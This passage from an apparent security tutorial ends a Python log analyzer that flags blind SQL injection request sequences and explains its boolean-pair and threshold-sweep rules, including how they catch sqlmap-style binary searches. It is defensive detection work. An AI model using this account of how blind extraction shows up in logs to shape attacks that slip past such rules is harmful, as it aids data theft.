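            findings.append(("threshold-sweep", ip, path, len(variants)))
    return findings


if __name__ == "__main__":
    for finding in find_blind_sequences(SAMPLE_LOG):
        print(*finding)
```

The boolean-pair rule fires before a single byte of data has been extracted, which is the point at which blocking the source is still cheap; the sweep rule is the one that also catches an automated tool such as the sqlmap mentioned above, since a binary search over ASCII values still produces many same-shaped requests. Tune min_variants to the path's normal traffic.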